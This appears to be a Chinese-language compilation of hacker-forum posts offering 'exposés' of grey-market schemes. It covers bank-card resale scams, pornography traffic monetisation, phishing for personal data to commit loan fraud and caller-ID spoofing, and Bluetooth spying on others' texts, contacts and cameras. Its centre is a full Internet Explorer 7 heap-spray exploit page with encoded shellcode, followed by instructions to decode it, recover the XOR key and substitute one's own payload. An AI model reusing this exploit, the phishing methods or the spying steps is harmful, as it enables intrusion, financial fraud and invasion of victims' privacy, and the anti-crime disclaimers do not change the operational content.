灰色产业之银行卡转卖以及限制额度交易变现(黑产吃黑产揭秘)因为好多人觉得灰产很赚钱!解密一下!

灰色产业链对于目前得中国市场存在很严重得漏洞缺陷和法律缺陷!那么好多人放弃了工作走向了灰色产业!这里讲一下那些黑产吃黑产得故事!
倒卖全套银行卡以及黑吃黑得案例说明:
具体得截图就不做了大家可以按照说明去做!
首先百度搜索引擎搜索:(哪里可以买到银行卡)等关键字
|或者QQ群搜索:银行卡信息  买银行卡等
接下来就是交易了:
首先找到这些能够交易得人!

卖卡人   开通资金归集功能  或者 二级账户进行最后得 资金套现,具体说明如下(第三人称)

教程开始

卖卡的“高手”,几乎都是采用你能够接受的手段成交,例如邮寄到付或淘宝交易等。一整套的卡资料,包含银行卡卡片、U遁、电话卡、开户资料、开户绑定的手机卡等,有的还配备一个老人手机,资料的完整度没有任何的瑕疵,而且价格也低到你感到兴奋。

也许你会认为,这些卖卡的人,纯粹是为了卖卡赚钱,如果是那样想,你就错了。

因为他们卖卡给你,是先给你下个诱饵,然后套你一笔更大的。这有点应了那句“免费才是最贵”的话的感觉。

其实,这些人卖卡给你,可以做到双重收益,一种是直接卖给你,赚了你买卡的钱;一种是后期套你卡上的钱,让你白白为他打工。

第一种赚钱模式,就不多说,就是买卖关系。这里,重点讲述下第二种赚钱模式,就是如何套你卡上的钱。

因为大部分人买这些卡,都是用来洗钱或者做不见光项目。于是,这些卖卡给你的人,就通过资金归集的手段,将你的辛苦赚来的昧良心的钱给转移到他提前设定的账户。

所谓的“资金归集”黑你账户,就是开通“归集功能”或“二级账户”,通过设置你金额的限制,当你的金额达到设置的额度后,账户的资金就会自动转移到另外一个设定的账户,而且这个金额是可以随意设置。

更可恨的是,对方还可以设置你的提现和转账额度。他们的玩法,就是将你的账户额度设置得比较高,而转账和提现额度就特别低。所以,这个钱基本你就提现不了。因为他拥有一级账户权限,可以将二级账户的钱转走。

觉得不错 请支持我们!后续更新..黑产得那些事情!!想赚钱?还不看过来?大揭秘!

灰产之色情网站,微信平台,QQ平台等直播平台进行擦边网赚!(揭秘)

关于色情网站,有时候不仅仅是自己的资源,只要做到引流就可以进行网赚!
教程揭秘开始:
自己做一个html页面或者直接架设一个网站,资源做嵌入式开发即可!(直接套用其他网站的资源..也可以自己买)一个网盘60块钱  10000部或者更多!
微信群,QQ群则成了交易平台:农民工啊..学生啊..这些群体很容易的!(犯法的事情咱们不干!揭秘)
…..广告业务真心可以赚钱!,但是网络就应该是绿色的!本篇文本身还有后续!但是..不想再发了!….这只是其中之一…..网络毒瘤!请大家远离!
因为近期打掉了很多app以及网站!所以…网络环境需要你我他共同维护!
不过有人就有网赚,如果你有1000个人…随便扔出多少就有收货多少!
我们仅仅是为了揭秘!我们只是告诫大家远离黄赌毒!….网络需要绿色的!感谢大家一直以来的支持!

中国骇客云平台官网2018.2.21应用库更新公告(内附黑产盗用他人信息技术教程,禁止犯罪,违者必究)

中国骇客云平台官方站点应用库更新如下:
1.增加中国骇客云聊天服务器两个,分别为美国的以及德国聊天室!(有的会员知道很黄很暴力)
2.增加工业部信息查询,该功能可以查询服务如下说明:备案查询 备案信息查询 黑名单网站查询 基础代码查询 单位性质 前置审批或专项内容网站接入方式省市县代 服务器放置地IP 报备单位名称单位所属分类 行业分类网站服务内容证件类型域名类型 行政级别语种查询
3.修正了手机在线查询注册网址..可以通过该功能进行社工…玩儿黑客的人必用!!

接下来就是说的黑产盗用他人信息教程。
现如今线下商品分享以及用户链条非常庞大我们的方式为钓鱼试!
首先准备一个虚拟主机,准备一个域名。如果自己是程序员可以自己写一个APP,易4a你们懂的!
其次做连接送红包活动(当然这里是真送,不能假装送)
比如用虚拟主机搭建一个用户提现平台,这里淘宝的部分商店公众微信都有这样的功能,第二是搜集用户信息,在提现时,可以根据用户使用指纹提现,人脸识别,密码输入等!这些方式都是可以获取到的!!!不要告诉我你们不会!!教程不做这么细致!
搜集到用户信息以后,可以进行信息出售!信息的诈骗!银行贷款盗刷等业务!!
另外还有一种方式也就是金字塔方式,利用公众微信投票等,用户多增加一条信息或者进行二次推广时,强制用户留手机号码,因为现在的手机号都是实名认证的,想必如果你是一个联通部门的一个小小业务员的话,拿用户信息非常简单,可以利用用户信息当时的视频资料,身份证信息等等进行诈骗。如果你当时钓鱼时用户手机关注留了手机号码并留其姓名推送,下一个也进行推送也就形成了好友链条。通过手机改号…进行……zha……嗯…怎么样…话不用我编吧!手机改号有..就看你们会不会了?(悄悄的高速你骇客云应用库就有手机改号噢 )也就是说想用谁的电话号码给谁打电话都是可以的..不知道你们懂不懂000
下来还有一种方式,这种方式成功率百分之百,首先,拿一些礼品上街道上去,扫一下二维码天添加好友并关注你的账户和公众微信送一个礼品,当然送红包也行,然后告诉这些扫描过的人说,我们正在举办活动,都是免费的,用小本本留一下对方的手机号,以及姓名就可以了……然后..具体还用我说吗》?
不用我说的多么的透彻吧!!!!!!
第一个方法可以利用网络诈骗以及银行贷款服务,这个得需要看你如何做钓鱼..其实银行的部分或者是个人网贷都非常的简单,只要你冒用他人信息即可完成操作,也就是说..你用别人的身份给自己贷款….具体钓鱼..自己研究!!!!
废话不多说了 ..容易被..所以感谢支持骇客云平台官方网站!感觉我们牛逼就关注我们的公众微信,我们只是公开了这些秘密,让更多的人知道!谨防上当受骗!!!!!!

2017最新ie0day样本网马修改~

最近流行的最新网马IE70day+shellcode+exe样本已经出来了,刚刚看到,感觉蛮新奇的,毕竟现在还是样本,想把它改成自己的马还得费一番功夫。目前的网马一般改下shellcode就ok了。不过听别人说,如果单纯改shellcode的话,ie会出现崩溃,所以要找到适合得shellcode还是得费一番功夫,不过,有现成的,不用不是浪费么?废话不多说,分析开始。

网马的样本如下更多关注www.hackerschina.org

复制内容到剪贴板

代码:

if(navigator.userAgent.toLowerCase().indexOf(“msie 7”)==-1)location.replace(“about:blank”);

function sleep(milliseconds)

{

var start=new Date().getTime();

for(var i=0;i<1e7;i++)

{if((new Date().getTime()-start)>milliseconds)

{break}

}

}

function spray(sc)

{

var infect=unescape(sc.replace(/dadong/g,”\x25\x75″));

var heapBlockSize=0x100000;

var payLoadSize=infect.length*2;

var szlong=heapBlockSize-(payLoadSize+0x038);

var retVal=unescape(“%u0a0a%u0a0a”);

retVal=getSampleValue(retVal,szlong);

aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

zzchuck=new Array();

for(i=0;i<aaablk;i++){zzchuck=retval+infect}< p=””>

}

function getSampleValue(retVal,szlong)

{

while(retVal.length*2<szlong)< p=””>

{retVal+=retVal}

retVal=retVal.substring(0,szlong/2);

return retVal

}

var a1=”dadong”;

spray(a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021″);

sleep(3000);

nav=navigator.userAgent.toLowerCase();

if(navigator.appVersion.indexOf(‘MSIE’)!=-1)

{

version=parseFloat(navigator.appVersion.split(‘MSIE’)[1])

}

if(version==7)

{

w2k3=((nav.indexOf(‘windows nt 5.2’)!=-1)||(nav.indexOf(‘windows 2003’)!=-1));

wxp=((nav.indexOf(‘windows nt 5.1’)!=-1)||(nav.indexOf(‘windows xp’)!=-1));

if(wxp||w2k3)document.write(‘]]>’);

var i=1;while(i<=10)

{

window.status=” “;i++}

}

   

首先,大家肯定会查找shellcode在哪里,这个样本得shellcode刚刚看起来貌似和其他的马有些不同,是

a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031

的形式,其实明白人一看就出来,这样得加密其实很容易解,解密函数就是sc.replace(/dadong/g,”\x25\x75″)了。

解开之后,shellcode就露出庐山真面目了

复制内容到剪贴板

代码:

u9090%u%u9090%u9090%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021有了shellcode,下一步就是抄家伙分析了,首先把shellcode转换成exe文件,用OD载入

单步跟踪,到如下位置的时候注意了

如图所示

 

XOR BYTE PIR DS:[EAX],21

这个是负责shellcode解密得函数了,由于shellcode用的是异或加密,并且从这里可以看出密钥是21,这就好办啦~~~

我们把shellcode的 复制内容到剪贴板 代码:%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021

 

知道了以上这些原理,把这个网马改成自己得马就简单了!

我们只要把自己马的地址用21异或运算,并且转换成unicode替换原来的那些,并且按照原理得方法加密unicode,网马的改造就算完成了!!!

知道了道理,写生成器也就不是什么难事了~~~

中国骇客云教你巧用“蓝牙间谍”遥控远程手机

当别人手机收到短信时,你是否想在自己的手机上同步阅读其内容?你是否希望在自己的手机上查阅别人手机的通讯录,找到自己所需的电话号码?你是否希望通过自己的手机,遥控别人的手机拨打所需的电话?你是否希望通过自己的手机,遥控别人手机的摄像头来拍摄照片?

上述想法是不是有些奇特,看起来似乎无法实现?其实使用蓝牙间谍这款小巧的手机软件,就可以将上述想法变成现实。当然,提示是相关的手机必须支持蓝牙(实际上蓝牙几乎成为手机标准之一),而且你的手机必须支持Java。限于蓝牙通讯自身的限制,遥控距离自己不应超过10米(例如图书馆,宿舍,办公室等环境)。

为了说明蓝牙间谍的使用,我们这里就以小米 5和小米 6为例进行讲解,小米5为主控机,小米6为被控机。首先在小米 6手机上打开设置“功能表”,在其中打开“设置”程序项。进入其中的“数据连通”菜单,在其中打开“蓝牙”设置项,打开其蓝牙功能。在小米 5上也打开蓝牙功能。在Nokfa 6蓝牙菜单中打开“已配对设备”项,在其中点击“添加新设备”项,搜索周边的蓝牙手机,很快就找到了小米5手机.在双方的手机上输入相同的识别码,完成两手机的连接操作。之后在两个手机蓝牙菜单中的“已配对设备”中可以看到对方的手机名称。

上述操作在实际过程中是需要首先接触被控端手机的,至于怎么完成,完全取决于你的社会工程学。完成后,两手机就可以通过蓝牙进行连接和数据传输,我们通过数据线,将蓝牙间谍程序‘‘btspyjar”传输到小米 5上,目的是通过小米5遥控小米 6。蓝牙间谍的厉害之处就在于没有在目标手机上安装任何软件,仅仅需要将主控端手机添加到被控端手机的蓝牙配对设备中,当然,在被控机上开启启蓝牙功能后,在会在手机屏幕顶端显示蓝牙标记,不过一般人对该标识并不在意,这就为蓝牙间谍提供了“可乘之机”。在小米5中的“应用软件”面板中打开蓝牙间谍程序存储路径,在其中找到名

称为“BT INFO”的程序。蓝牙间谍,启动该程序,在其运行界面中执行“连接”项,在下一步窗口中执行“搜索设备”项,蓝牙间谍即可对周边的蓝牙设备进行搜索,很快随着小米 5的振动,提示找到了所有符合条件的手机,这里我们找到的是小米6手机,注意其名称是以“$SS (5C57)”格式命名的,选中该设备,在下一步窗口中显示其蓝牙地址,实际上,每一个蓝牙设备都是有地址的,格式以“btspp://”开头,后面跟随具俸的地址。选中小米 6蓝牙地址,在下一步窗口中显示是否连接的提示信息,确认后即可进入蓝牙间谍主控界面。

 

蓝牙间谍主控界面提供了“提示”、“通话”、“按键”、“点击按键”、“通讯录”、“正在读取短信”、“电话功能”、“加锁”、“Clip”、“Clir”、“操作”、“预设命令”、“连接”等远程控制命令,可以对目标手机执行复杂的远程控制动作。例如当小米6接收到短信后,蓝牙间谍会将信号立即传输给小米5,并通过手机发出提示音,这样使用者就可以在蓝牙间谍主控界面中执行“正在读取短信”项,同步读取小米 6接收到的短信了。想查看目标手机的通讯录,方法很简单,在蓝牙间谍主控界面中执行“通讯录”项,蓝牙间谍就可以通过蓝牙连接将目标机中的通讯录完整的传输到控制端手机上。这里我们就可以读取小米6的通讯录。执行该命令后,在弹出窗口显示小米 6的通讯录、已拨号电话信息、未接来电信息、已应答电话信息等类别。进入不同的分类,例如打开通讯录,在弹出窗口中可以盈示小米 6中的所有电话号码。直接点击目标电话号码,就可队遥控小米 6拨打该号码。

使用蓝牙间谍,您完全可以对目标机的通话状态进行控制。在小米 5上打开蓝牙间谍主控界面中的“通话”项,在弹出窗口中执行“呼叫号码”,在输入框,中输入所需的号码,确认后就可以直接通过小米 6拨打该号码。当小米6在正常通话时,在小米 5中蓝牙间谍上述“通话”面板中执行“挂断通话”项,可以直接切断小米 6的通话。如果执行“保持通话”项,可以让通话过程保持继续。执行“最后拨号”项,可以遥控小米 6自动拨打最近一次拨打的电话号码。如果相对目标机的按键进行遥控操作的话,可以在小米 5上的蓝牙间谍主控界面上执行“按键”项,在弹出窗口,如中选择“摇杆”项,在打开的控制界面。我们可以执行“向上”、“向下”、“向左”、“向右”、“点击”、“返回”、“左软键”、“右软键”等项,可以遥控小米 6的手机按键操作,如同在小米 6手机键盘上点击上、下、左、右、确认、左侧键、右侧键一样。在上述弹出面板中选择“操纵”项,在弹出窗口。或者可以对小米 6执行增大音量、减小音量、打开媒体播放器、控制媒体播放器播放、停止动作、打开手机摄像头、控制对焦,打开视频通话、控制多任务运行、调节屏幕亮度等遥控操作。如果在上述弹出面板中选择“号码”项,可以进入号码输入界面,点击预设按键,即可完成号码输入操作,之后可以遥控小米 6拨打该电话。如果在上述弹出面板中选择“Java”项,可以控制目标上的Java程序运行。

在小米 5的蓝牙主控面板中执行“电话功能”项,可以掌控目标机的电话功能。

